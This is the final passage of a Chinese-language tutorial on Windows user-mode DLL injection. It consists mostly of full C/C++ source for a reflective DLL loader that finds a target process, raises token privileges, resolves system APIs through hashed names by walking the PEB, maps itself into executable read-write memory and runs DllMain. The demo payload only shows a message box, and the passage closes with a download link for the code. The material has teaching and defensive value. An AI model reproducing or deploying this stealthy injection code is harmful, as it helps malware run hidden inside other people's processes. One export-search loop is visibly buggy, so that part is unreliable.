NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;PIMAGE_EXPORT_DIRECTORY ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PUINT8)BaseAddress + RVAToOffset(ExportDirectoryRVA, NtHeader));UINT32 AddressOfNamesRVA = ExportDirectory->AddressOfNames;PUINT32 AddressOfNames = (PUINT32)((PUINT8)BaseAddress + RVAToOffset(AddressOfNamesRVA, NtHeader));UINT32 AddressOfFunctionsRVA = ExportDirectory->AddressOfFunctions;PUINT32 AddressOfFunctions = (PUINT32)((PUINT8)BaseAddress + RVAToOffset(AddressOfFunctionsRVA, NtHeader));UINT32 AddressOfNameOrdinalsRVA = ExportDirectory->AddressOfNameOrdinals;PUINT16 AddressOfNameOrdinals = (PUINT16)((PUINT8)BaseAddress + RVAToOffset(AddressOfNameOrdinalsRVA, NtHeader));for (UINT32 i = 0; i < ExportDirectory->NumberOfFunctions; i++){CHAR* ExportFunctionName = (CHAR*)((PUINT8)BaseAddress + RVAToOffset(*AddressOfNames, NtHeader));if (strstr(ExportFunctionName, "LoadDllByOEP") != NULL){UINT16 ExportFunctionOrdinals = AddressOfNameOrdinals[i];return RVAToOffset(AddressOfFunctions[ExportFunctionOrdinals], NtHeader);}}return 0;}/************************************************************************* Name : RVAToOffset* Param: RVA 內存中偏移* Param: NtHeader Nt頭* Ret : UINT32* 內存中偏移轉換成文件中偏移************************************************************************/UINT32 RVAToOffset(UINT32 RVA, PIMAGE_NT_HEADERS NtHeader){UINT32 i = 0;PIMAGE_SECTION_HEADER SectionHeader = NULL;SectionHeader = IMAGE_FIRST_SECTION(NtHeader);if (RVA < SectionHeader[0].PointerToRawData){return RVA;}for (i = 0; i < NtHeader->FileHeader.NumberOfSections; i++){if (RVA >= SectionHeader[i].VirtualAddress && RVA < (SectionHeader[i].VirtualAddress + SectionHeader[i].SizeOfRawData)){return (RVA - SectionHeader[i].VirtualAddress + SectionHeader[i].PointerToRawData);}}return 0;}/************************************************************************* Name : GetProcessIdByProcessImageName* Param: wzProcessImageName 進程映像名稱 (IN)* Param: TargetProcessId 進程Id (OUT)* Ret : BOOLEAN* 使用ToolHelp系列函數通過進程映像名稱獲得進程Id************************************************************************/BOOL GetProcessIdByProcessImageName(IN WCHAR* wzProcessImageName, OUT UINT32* TargetProcessId){HANDLE ProcessSnapshotHandle = NULL;PROCESSENTRY32 ProcessEntry32 = { 0 };ProcessEntry32.dwSize = sizeof(PROCESSENTRY32); // 初始化PROCESSENTRY32結構ProcessSnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // 給系統所有的進程快照if (ProcessSnapshotHandle == INVALID_HANDLE_VALUE){return FALSE;}Process32First(ProcessSnapshotHandle, &ProcessEntry32); // 找到第一個do{if (lstrcmpi(ProcessEntry32.szExeFile, wzProcessImageName) == 0) // 不區分大小寫{*TargetProcessId = ProcessEntry32.th32ProcessID;break;}} while (Process32Next(ProcessSnapshotHandle, &ProcessEntry32));CloseHandle(ProcessSnapshotHandle);ProcessSnapshotHandle = NULL;return TRUE;}/************************************************************************* Name : GrantPriviledge* Param: PriviledgeName 想要提升的權限* Ret : BOOLEAN* 提升自己想要的權限************************************************************************/BOOL GrantPriviledge(WCHAR* PriviledgeName){TOKEN_PRIVILEGES TokenPrivileges, OldPrivileges;DWORD dwReturnLength = sizeof(OldPrivileges);HANDLE TokenHandle = NULL;LUID uID;// 打開權限令牌if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &TokenHandle)){if (GetLastError() != ERROR_NO_TOKEN){return FALSE;}if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle)){return FALSE;}}if (!LookupPrivilegeValue(NULL, PriviledgeName, &uID)) // 通過權限名稱查找uID{CloseHandle(TokenHandle);return FALSE;}TokenPrivileges.PrivilegeCount = 1; // 要提升的權限個數TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // 動態數組�,數組大小根據Count的數目TokenPrivileges.Privileges[0].Luid = uID;// 在這里我們進行調整權限if (!AdjustTokenPrivileges(TokenHandle, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), &OldPrivileges, &dwReturnLength)){CloseHandle(TokenHandle);return FALSE;}// 成功了CloseHandle(TokenHandle);return TRUE;}// LoadRemoteDll.h#include <Windows.h>#include <intrin.h>#ifdef LOADREMOTEDLL_EXPORTS#define LOADREMOTEDLL_API __declspec(dllexport)#else#define LOADREMOTEDLL_API __declspec(dllimport)#endif#define KERNEL32DLL_HASH 0x6A4ABC5B#define NTDLLDLL_HASH 0x3CFA685D#define LOADLIBRARYA_HASH 0xEC0E4E8E#define GETPROCADDRESS_HASH 0x7C0DFCAA#define VIRTUALALLOC_HASH 0x91AFCA54#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8#define IMAGE_REL_BASED_ARM_MOV32A 5#define IMAGE_REL_BASED_ARM_MOV32T 7#define HASH_KEY 13#pragma intrinsic( _rotr )__forceinline UINT32 ror(UINT32 d){return _rotr(d, HASH_KEY);}__forceinline UINT32 hash(char * c){register UINT32 h = 0;do{h = ror(h);h += *c;} while (*++c);return h;}//////////////////////////////////////////////////////////////////////////typedef struct _UNICODE_STRING{USHORT Length;USHORT MaximumLength;PWSTR Buffer;} UNICODE_STRING, *PUNICODE_STRING;typedef struct _PEB_LDR_DATA_WIN7_X64{UINT32 Length;UINT8 Initialized;UINT8 _PADDING0_[0x3];PVOID SsHandle;LIST_ENTRY InLoadOrderModuleList;LIST_ENTRY InMemoryOrderModuleList;LIST_ENTRY InInitializationOrderModuleList;PVOID EntryInProgress;UINT8 ShutdownInProgress;UINT8 _PADDING1_[0x7];PVOID ShutdownThreadId;}PEB_LDR_DATA_WIN7_X64, *PPEB_LDR_DATA_WIN7_X64;typedef struct _PEB_LDR_DATA_WINXP_X86{UINT32 Length;UINT8 Initialized;UINT8 _PADDING0_[0x3];PVOID SsHandle;LIST_ENTRY InLoadOrderModuleList;LIST_ENTRY InMemoryOrderModuleList;LIST_ENTRY InInitializationOrderModuleList;PVOID EntryInProgress;}PEB_LDR_DATA_WINXP_X86, *PPEB_LDR_DATA_WINXP_X86;#ifdef _WIN64#define PPEB_LDR_DATA PPEB_LDR_DATA_WIN7_X64#define PEB_LDR_DATA PEB_LDR_DATA_WIN7_X64#else #define PPEB_LDR_DATA PPEB_LDR_DATA_WINXP_X86#define PEB_LDR_DATA PEB_LDR_DATA_WINXP_X86#endiftypedef struct _CURDIR{UNICODE_STRING DosPath;HANDLE Handle;} CURDIR, *PCURDIR;typedef struct _RTL_USER_PROCESS_PARAMETERS_WINXP_X86 {UINT32 MaximumLength;UINT32 Length;UINT32 Flags;UINT32 DebugFlags;HANDLE ConsoleHandle;UINT32 ConsoleFlags;HANDLE StandardInput;HANDLE StandardOutput;HANDLE StandardError;CURDIR CurrentDirectory; // ProcessParametersUNICODE_STRING DllPath; // ProcessParametersUNICODE_STRING ImagePathName; // ProcessParametersUNICODE_STRING CommandLine; // ProcessParametersPVOID Environment;UINT32 StartingX;UINT32 StartingY;UINT32 CountX;UINT32 CountY;UINT32 CountCharsX;UINT32 CountCharsY;UINT32 FillAttribute;UINT32 WindowFlags;UINT32 ShowWindowFlags;UNICODE_STRING WindowTitle;UNICODE_STRING DesktopInfo;UNICODE_STRING ShellInfo;UNICODE_STRING RuntimeData;UINT32 CurrentDirectores[8];}RTL_USER_PROCESS_PARAMETERS_WINXP_X86, *PRTL_USER_PROCESS_PARAMETERS_WINXP_X86;typedef struct _RTL_USER_PROCESS_PARAMETERS_WIN7_X64 {UINT32 MaximumLength;UINT32 Length;UINT32 Flags;UINT32 DebugFlags;HANDLE ConsoleHandle;UINT32 ConsoleFlags;HANDLE StandardInput;HANDLE StandardOutput;HANDLE StandardError;CURDIR CurrentDirectory; // ProcessParametersUNICODE_STRING DllPath; // ProcessParametersUNICODE_STRING ImagePathName; // ProcessParametersUNICODE_STRING CommandLine; // ProcessParametersPVOID Environment;UINT32 StartingX;UINT32 StartingY;UINT32 CountX;UINT32 CountY;UINT32 CountCharsX;UINT32 CountCharsY;UINT32 FillAttribute;UINT32 WindowFlags;UINT32 ShowWindowFlags;UNICODE_STRING WindowTitle;UNICODE_STRING DesktopInfo;UNICODE_STRING ShellInfo;UNICODE_STRING RuntimeData;UINT32 CurrentDirectores[8];UINT64 EnvironmentSize;UINT64 EnvironmentVersion;}RTL_USER_PROCESS_PARAMETERS_WIN7_X64, *PRTL_USER_PROCESS_PARAMETERS_WIN7_X64;#ifdef _WIN64#define PRTL_USER_PROCESS_PARAMETERS PRTL_USER_PROCESS_PARAMETERS_WIN7_X64#define RTL_USER_PROCESS_PARAMETERS RTL_USER_PROCESS_PARAMETERS_WIN7_X64#else #define PRTL_USER_PROCESS_PARAMETERS PRTL_USER_PROCESS_PARAMETERS_WINXP_X86#define RTL_USER_PROCESS_PARAMETERS RTL_USER_PROCESS_PARAMETERS_WINXP_X86#endif#define GDI_HANDLE_BUFFER_SIZE32 34#define GDI_HANDLE_BUFFER_SIZE64 60#ifndef _WIN64#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32#else#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64#endiftypedef UINT32 GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];// PEB結構typedef struct _PEB{BOOLEAN InheritedAddressSpace;BOOLEAN ReadImageFileExecOptions;BOOLEAN BeingDebugged;union{BOOLEAN BitField;struct{BOOLEAN ImageUsesLargePages : 1;BOOLEAN IsProtectedProcess : 1;BOOLEAN IsLegacyProcess : 1;BOOLEAN IsImageDynamicallyRelocated : 1;BOOLEAN SkipPatchingUser32Forwarders : 1;BOOLEAN IsPackagedProcess : 1;BOOLEAN IsAppContainer : 1;BOOLEAN SpareBits : 1;};};HANDLE Mutant;PVOID ImageBaseAddress;PPEB_LDR_DATA Ldr;PRTL_USER_PROCESS_PARAMETERS ProcessParameters;PVOID SubSystemData;PVOID ProcessHeap;PRTL_CRITICAL_SECTION FastPebLock;PVOID AtlThunkSListPtr;PVOID IFEOKey;union{UINT32 CrossProcessFlags;struct{UINT32 ProcessInJob : 1;UINT32 ProcessInitializing : 1;UINT32 ProcessUsingVEH : 1;UINT32 ProcessUsingVCH : 1;UINT32 ProcessUsingFTH : 1;UINT32 ReservedBits0 : 27;};UINT32 EnvironmentUpdateCount;};union{PVOID KernelCallbackTable;PVOID UserSharedInfoPtr;};UINT32 SystemReserved[1];UINT32 AtlThunkSListPtr32;PVOID ApiSetMap;UINT32 TlsExpansionCounter;PVOID TlsBitmap;UINT32 TlsBitmapBits[2];PVOID ReadOnlySharedMemoryBase;PVOID HotpatchInformation;PVOID* ReadOnlyStaticServerData;PVOID AnsiCodePageData;PVOID OemCodePageData;PVOID UnicodeCaseTableData;UINT32 NumberOfProcessors;UINT32 NtGlobalFlag;LARGE_INTEGER CriticalSectionTimeout;SIZE_T HeapSegmentReserve;SIZE_T HeapSegmentCommit;SIZE_T HeapDeCommitTotalFreeThreshold;SIZE_T HeapDeCommitFreeBlockThreshold;UINT32 NumberOfHeaps;UINT32 MaximumNumberOfHeaps;PVOID* ProcessHeaps;PVOID GdiSharedHandleTable;PVOID ProcessStarterHelper;UINT32 GdiDCAttributeList;PRTL_CRITICAL_SECTION LoaderLock;UINT32 OSMajorVersion;UINT32 OSMinorVersion;UINT16 OSBuildNumber;UINT16 OSCSDVersion;UINT32 OSPlatformId;UINT32 ImageSubsystem;UINT32 ImageSubsystemMajorVersion;UINT32 ImageSubsystemMinorVersion;UINT_PTR ImageProcessAffinityMask;GDI_HANDLE_BUFFER GdiHandleBuffer;PVOID PostProcessInitRoutine;PVOID TlsExpansionBitmap;UINT32 TlsExpansionBitmapBits[32];UINT32 SessionId;ULARGE_INTEGER AppCompatFlags;ULARGE_INTEGER AppCompatFlagsUser;PVOID pShimData;PVOID AppCompatInfo;UNICODE_STRING CSDVersion;PVOID ActivationContextData;PVOID ProcessAssemblyStorageMap;PVOID SystemDefaultActivationContextData;PVOID SystemAssemblyStorageMap;SIZE_T MinimumStackCommit;PVOID* FlsCallback;LIST_ENTRY FlsListHead;PVOID FlsBitmap;UINT32 FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(UINT32) * 8)];UINT32 FlsHighIndex;PVOID WerRegistrationData;PVOID WerShipAssertPtr;PVOID pContextData;PVOID pImageHeaderHash;union{UINT32 TracingFlags;struct{UINT32 HeapTracingEnabled : 1;UINT32 CritSecTracingEnabled : 1;UINT32 LibLoaderTracingEnabled : 1;UINT32 SpareTracingBits : 29;};};UINT64 CsrServerReadOnlySharedMemoryBase;} PEB, *PPEB;// Ldr 三根鏈表結構typedef struct _LDR_DATA_TABLE_ENTRY {LIST_ENTRY InLoadOrderLinks;LIST_ENTRY InMemoryOrderLinks;LIST_ENTRY InInitializationOrderLinks;PVOID DllBase;PVOID EntryPoint;UINT32 SizeOfImage;UNICODE_STRING FullDllName;UNICODE_STRING BaseDllName;UINT32 Flags;UINT16 LoadCount;UINT16 TlsIndex;union {LIST_ENTRY HashLinks;struct {PVOID SectionPointer;UINT32 CheckSum;};};union {struct {UINT32 TimeDateStamp;};struct {PVOID LoadedImports;};};struct _ACTIVATION_CONTEXT * EntryPointActivationContext;PVOID PatchInformation;} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;typedef const struct _LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY;LOADREMOTEDLL_API UINT_PTR WINAPI LoadDllByOEP(PVOID lParam);// LoadRemoteDll.cpp// LoadRemoteDll.cpp : 定義 DLL 應用程序的導出函數�。//#include "stdafx.h"#include "LoadRemoteDll.h"#pragma intrinsic(_ReturnAddress)__declspec(noinline)UINT_PTR caller(){return (UINT_PTR)_ReturnAddress(); // #include <intrin.h>}typedefHMODULE(WINAPI * pfnLoadLibraryA)(LPCSTR lpLibFileName);typedefFARPROC(WINAPI * pfnGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);typedefLPVOID(WINAPI * pfnVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);typedefLONG // NTSTATUS(NTAPI * pfnNtFlushInstructionCache)(HANDLE ProcessHandle, PVOID BaseAddress, SIZE_T Length);typedefBOOL(APIENTRY * pfnDllMain)(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);LOADREMOTEDLL_API UINT_PTR WINAPI LoadDllByOEP(PVOID lParam){UINT_PTR LibraryAddress = 0;PIMAGE_DOS_HEADER DosHeader = NULL;PIMAGE_NT_HEADERS NtHeader = NULL;pfnLoadLibraryA LoadLibraryAAddress = NULL;pfnGetProcAddress GetProcAddressAddress = NULL;pfnVirtualAlloc VirtualAllocAddress = NULL;pfnNtFlushInstructionCache NtFlushInstructionCacheAddress = NULL;LibraryAddress = caller(); // 獲得下一步指令的地址�����,其實就是為了獲得當前指令地址��,為后面尋找PE頭提供起點DosHeader = (PIMAGE_DOS_HEADER)LibraryAddress;while (TRUE){if (DosHeader->e_magic == IMAGE_DOS_SIGNATURE &&DosHeader->e_lfanew >= sizeof(IMAGE_DOS_HEADER) &&DosHeader->e_lfanew < 1024){NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)LibraryAddress + DosHeader->e_lfanew);if (NtHeader->Signature == IMAGE_NT_SIGNATURE){break;}}LibraryAddress--;DosHeader = (PIMAGE_DOS_HEADER)LibraryAddress;}// 獲得PEB#ifdef _WIN64PPEB Peb = (PPEB)__readgsqword(0x60);#elsePPEB Peb = (PPEB)__readfsdword(0x30);#endifPPEB_LDR_DATA Ldr = Peb->Ldr;// 1.從Dll導出表中獲取函數地址for (PLIST_ENTRY TravelListEntry = (PLIST_ENTRY)Ldr->InLoadOrderModuleList.Flink;TravelListEntry != &Ldr->InLoadOrderModuleList; // 空頭節點TravelListEntry = TravelListEntry->Flink){PLDR_DATA_TABLE_ENTRY LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)TravelListEntry;UINT32 FunctionCount = 0;// WCHAR* DllName = (WCHAR*)LdrDataTableEntry->BaseDllName.Buffer;UINT_PTR DllName = (UINT_PTR)LdrDataTableEntry->BaseDllName.Buffer;UINT32 DllLength = LdrDataTableEntry->BaseDllName.Length;UINT_PTR DllBaseAddress = (UINT_PTR)LdrDataTableEntry->DllBase;DosHeader = (PIMAGE_DOS_HEADER)DllBaseAddress;NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)DllBaseAddress + DosHeader->e_lfanew);IMAGE_DATA_DIRECTORY ExportDataDirectory = (IMAGE_DATA_DIRECTORY)(NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);PIMAGE_EXPORT_DIRECTORY ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PUINT8)DllBaseAddress + ExportDataDirectory.VirtualAddress);PUINT32 AddressOfFunctions = (PUINT32)((PUINT8)DllBaseAddress + ExportDirectory->AddressOfFunctions);PUINT32 AddressOfNames = (PUINT32)((PUINT8)DllBaseAddress + ExportDirectory->AddressOfNames);PUINT16 AddressOfNameOrdinals = (PUINT16)((PUINT8)DllBaseAddress + ExportDirectory->AddressOfNameOrdinals);UINT16 Ordinal = 0;UINT_PTR ExportFunctionAddress = 0;UINT32 HashValue = 0;// 將Dll名稱轉換成Hash值do{HashValue = ror((UINT32)HashValue);if (*((PUINT8)DllName) >= 'a'){HashValue += *((PUINT8)DllName) - 0x20;}else{HashValue += *((PUINT8)DllName);}DllName++;} while (--DllLength);if (HashValue == KERNEL32DLL_HASH){FunctionCount = 3;for (INT i = 0; i < ExportDirectory->NumberOfFunctions; i++){if (FunctionCount == 0){break;}CHAR* szExportFunctionName = (CHAR*)((PUINT8)DllBaseAddress + AddressOfNames[i]);HashValue = hash(szExportFunctionName);if (HashValue == LOADLIBRARYA_HASH){Ordinal = AddressOfNameOrdinals[i];LoadLibraryAAddress = (pfnLoadLibraryA)((PUINT8)DllBaseAddress + AddressOfFunctions[Ordinal]);FunctionCount--;}else if (HashValue == GETPROCADDRESS_HASH){Ordinal = AddressOfNameOrdinals[i];GetProcAddressAddress = (pfnGetProcAddress)((PUINT8)DllBaseAddress + AddressOfFunctions[Ordinal]);FunctionCount--;}else if (HashValue == VIRTUALALLOC_HASH){Ordinal = AddressOfNameOrdinals[i];VirtualAllocAddress = (pfnVirtualAlloc)((PUINT8)DllBaseAddress + AddressOfFunctions[Ordinal]);FunctionCount--;}}}else if (HashValue == NTDLLDLL_HASH){FunctionCount = 1;for (INT i = 0; i < ExportDirectory->NumberOfFunctions; i++){if (FunctionCount == 0){break;}CHAR* szExportFunctionName = (CHAR*)((PUINT8)DllBaseAddress + AddressOfNames[i]);HashValue = hash(szExportFunctionName);if (HashValue == NTFLUSHINSTRUCTIONCACHE_HASH){Ordinal = AddressOfNameOrdinals[i];NtFlushInstructionCacheAddress = (pfnNtFlushInstructionCache)((PUINT8)DllBaseAddress + AddressOfFunctions[Ordinal]);FunctionCount--;}}}if (LoadLibraryAAddress != NULL &&GetProcAddressAddress != NULL &&VirtualAllocAddress != NULL &&NtFlushInstructionCacheAddress != NULL){break;}}// 2.申請內存��,重新加載我們的Dll// 再次更新DosHeader和NtHeaderDosHeader = (PIMAGE_DOS_HEADER)LibraryAddress;NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)LibraryAddress + DosHeader->e_lfanew);// 重新申請內存(SizeOfImage就是PE在內存中的大?���。?* _asm{int 3;}*/// 這個自己重新申請的頭指針不敢隨便移動��,使用一個變量來替代UINT_PTR NewBaseAddress = (UINT_PTR)VirtualAllocAddress(NULL, NtHeader->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);UINT_PTR OldPtr = LibraryAddress;UINT_PTR BasePtr = NewBaseAddress;// 2.1首先拷貝頭 + 節表UINT32 SizeOfHeaders = NtHeader->OptionalHeader.SizeOfHeaders;while (SizeOfHeaders--){*(PUINT8)BasePtr++ = *(PUINT8)OldPtr++;}// memcpy((PVOID)NewBaseAddress, (PVOID)LibraryAddress, NtHeader->OptionalHeader.SizeOfHeaders);/*PIMAGE_SECTION_HEADER SectionHeader = (PIMAGE_SECTION_HEADER)((PUINT8)&NtHeader->OptionalHeader + NtHeader->FileHeader.SizeOfOptionalHeader);UINT32 NumberOfSections = NtHeader->FileHeader.NumberOfSections;while (NumberOfSections--){UINT_PTR NewSectionAddress = (UINT_PTR)((PUINT8)NewBaseAddress + SectionHeader->VirtualAddress);UINT_PTR OldSectionAddress = (UINT_PTR)((PUINT8)LibraryAddress + SectionHeader->PointerToRawData);UINT32 SizeOfRawData = SectionHeader->SizeOfRawData;while (SizeOfRawData--){*(PUINT8)NewSectionAddress++ = *(PUINT8)OldSectionAddress++;}SectionHeader = (PIMAGE_SECTION_HEADER)((PUINT8)SectionHeader + sizeof(IMAGE_SECTION_HEADER));}*/// 2.2拷貝節區PIMAGE_SECTION_HEADER SectionHeader = IMAGE_FIRST_SECTION(NtHeader);for (INT i = 0; i < NtHeader->FileHeader.NumberOfSections; i++){if (SectionHeader[i].VirtualAddress == 0 || SectionHeader[i].SizeOfRawData == 0) // 節塊里面沒有數據{continue;}// 定位該節塊在內存中的位置UINT_PTR NewSectionAddress = (UINT_PTR)((PUINT8)NewBaseAddress + SectionHeader[i].VirtualAddress);UINT_PTR OldSectionAddress = (UINT_PTR)((PUINT8)LibraryAddress + SectionHeader[i].PointerToRawData);// 復制節塊數據到虛擬內存UINT32 SizeOfRawData = SectionHeader[i].SizeOfRawData;while (SizeOfRawData--){*(PUINT8)NewSectionAddress++ = *(PUINT8)OldSectionAddress++;}//memcpy(SectionAddress, (PVOID)((PUINT8)LibraryAddress + SectionHeader[i].PointerToRawData), SectionHeader[i].SizeOfRawData);}// 2.3修正導入表(IAT)IMAGE_DATA_DIRECTORY ImportDataDirectory = (IMAGE_DATA_DIRECTORY)(NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]);PIMAGE_IMPORT_DESCRIPTOR ImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((PUINT8)NewBaseAddress + ImportDataDirectory.VirtualAddress);/* _asm{int 3;}*//*while (ImportDescriptor->Characteristics != 0){PIMAGE_THUNK_DATA FirstThunk = (PIMAGE_THUNK_DATA)((PUINT8)NewBaseAddress + ImportDescriptor->FirstThunk);PIMAGE_THUNK_DATA OriginalFirstThunk = (PIMAGE_THUNK_DATA)((PUINT8)NewBaseAddress + ImportDescriptor->OriginalFirstThunk);// 獲取導入模塊名稱// char szModuleName[MAX_PATH] = { 0 };PCHAR ModuleName = (PCHAR)((PUINT8)NewBaseAddress + ImportDescriptor->Name);HMODULE Dll = LoadLibraryAAddress(ModuleName);UINT_PTR FunctionAddress = 0;for (INT i = 0; OriginalFirstThunk[i].u1.Function != 0; i++){if (IMAGE_SNAP_BY_ORDINAL(OriginalFirstThunk[i].u1.Ordinal)){FunctionAddress = (UINT_PTR)GetProcAddressAddress(Dll, MAKEINTRESOURCEA((IMAGE_ORDINAL(OriginalFirstThunk[i].u1.Ordinal))));}else{PIMAGE_IMPORT_BY_NAME ImageImportByName = (PIMAGE_IMPORT_BY_NAME)((PUINT8)NewBaseAddress + OriginalFirstThunk[i].u1.AddressOfData);FunctionAddress = (UINT_PTR)GetProcAddressAddress(Dll, (CHAR*)ImageImportByName->Name); // 通過函數名稱得到函數地址}FirstThunk[i].u1.Function = FunctionAddress;}ImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((PUINT8)ImportDescriptor + sizeof(IMAGE_IMPORT_DESCRIPTOR));}*/for (INT i = 0; ImportDescriptor[i].Name != NULL; i++){// 加載導入動態庫HMODULE Dll = LoadLibraryAAddress((const CHAR*)((PUINT8)NewBaseAddress + ImportDescriptor[i].Name));PIMAGE_THUNK_DATA OriginalFirstThunk = (PIMAGE_THUNK_DATA)((PUINT8)NewBaseAddress + ImportDescriptor[i].OriginalFirstThunk);PIMAGE_THUNK_DATA FirstThunk = (PIMAGE_THUNK_DATA)((PUINT8)NewBaseAddress + ImportDescriptor[i].FirstThunk);UINT_PTR FunctionAddress = 0;// 遍歷每個導入模塊的函數for (INT j = 0; OriginalFirstThunk[j].u1.Function; j++){if (&OriginalFirstThunk[j] && IMAGE_SNAP_BY_ORDINAL(OriginalFirstThunk[j].u1.Ordinal)){// 序號導入---->這里直接從Dll的導出表中找到函數地址// FunctionAddress = (UINT_PTR)GetProcAddressAddress(Dll, MAKEINTRESOURCEA((IMAGE_ORDINAL(OriginalFirstThunk[j].u1.Ordinal)))); // 除去最高位即為序號DosHeader = (PIMAGE_DOS_HEADER)Dll;NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)Dll + DosHeader->e_lfanew);PIMAGE_EXPORT_DIRECTORY ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PUINT8)Dll + NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);// 導出函數地址RVA數組PUINT32 AddressOfFunctions = (PUINT32)((PUINT8)Dll + ExportDirectory->AddressOfFunctions);UINT16 Ordinal = IMAGE_ORDINAL(OriginalFirstThunk[j].u1.Ordinal - ExportDirectory->Base); // 導出函數編號 - Base(導出函數編號的起始值) = 導出函數在函數地址表中序號FunctionAddress = (UINT_PTR)((PUINT8)Dll + AddressOfFunctions[Ordinal]);}else{// 名稱導入PIMAGE_IMPORT_BY_NAME ImageImportByName = (PIMAGE_IMPORT_BY_NAME)((PUINT8)NewBaseAddress + OriginalFirstThunk[j].u1.AddressOfData);FunctionAddress = (UINT_PTR)GetProcAddressAddress(Dll, (CHAR*)ImageImportByName->Name); // 通過函數名稱得到函數地址}// 更新IATFirstThunk[j].u1.Function = FunctionAddress;}}// 2.4修正重定向表DosHeader = (PIMAGE_DOS_HEADER)LibraryAddress;NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)LibraryAddress + DosHeader->e_lfanew);// UINT_PTR Delta = NewBaseAddress - NtHeader->OptionalHeader.ImageBase;IMAGE_DATA_DIRECTORY BaseRelocDataDirectory = (IMAGE_DATA_DIRECTORY)(NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]);// 有無重定向表if (BaseRelocDataDirectory.Size != 0){PIMAGE_BASE_RELOCATION BaseRelocation = (PIMAGE_BASE_RELOCATION)((PUINT8)NewBaseAddress + BaseRelocDataDirectory.VirtualAddress);while (BaseRelocation->SizeOfBlock != 0){typedef struct _IMAGE_RELOC{UINT16 Offset : 12; // 低12位---偏移UINT16 Type : 4; // 高4位---類型} IMAGE_RELOC, *PIMAGE_RELOC;// 定位到重定位塊PIMAGE_RELOC RelocationBlock = (PIMAGE_RELOC)((PUINT8)BaseRelocation + sizeof(IMAGE_BASE_RELOCATION));// 計算需要修正的重定向位項的數目UINT32 NumberOfRelocations = (BaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(UINT16);for (INT i = 0; i < NumberOfRelocations; i++){if (RelocationBlock[i].Type == IMAGE_REL_BASED_DIR64){// 64 位PUINT64 Address = (PUINT64)((PUINT8)NewBaseAddress + BaseRelocation->VirtualAddress + RelocationBlock[i].Offset);UINT64 Delta = (UINT64)NewBaseAddress - NtHeader->OptionalHeader.ImageBase;*Address += Delta;}else if (RelocationBlock[i].Type == IMAGE_REL_BASED_HIGHLOW){// 32 位PUINT32 Address = (PUINT32)((PUINT8)NewBaseAddress + BaseRelocation->VirtualAddress + (RelocationBlock[i].Offset));UINT32 Delta = (UINT32)NewBaseAddress - NtHeader->OptionalHeader.ImageBase;*Address += Delta;}}// 轉到下一張重定向表BaseRelocation = (PIMAGE_BASE_RELOCATION)((PUINT8)BaseRelocation + BaseRelocation->SizeOfBlock);}}// 3.獲得模塊OEPUINT_PTR AddressOfEntryPoint = (UINT_PTR)((PUINT8)NewBaseAddress + NtHeader->OptionalHeader.AddressOfEntryPoint);NtFlushInstructionCacheAddress(INVALID_HANDLE_VALUE, NULL, 0);// 調用通過OEP去調用DllMain((pfnDllMain)AddressOfEntryPoint)((HMODULE)NewBaseAddress, DLL_PROCESS_ATTACH, lParam);/* _asm{int 3;}*/return AddressOfEntryPoint;}// dllmain.cpp : 定義 DLL 應用程序的入口點��。#include "stdafx.h"BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved){switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:{MessageBoxA(0, 0, 0, 0);break;}case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;} 0x09.總結
也許還有我沒有學習到的Ring3注入Dll的方法��,正所謂����,路漫漫其修遠兮,吾將上下而求索�����!
奉上代碼下載地址:https://github.com/YouArekongqi/InjectCollection.git
以上所述是小編給大家介紹的Windows x86/ x64 Ring3層注入Dll總結����,希望對大家有所幫助�����!
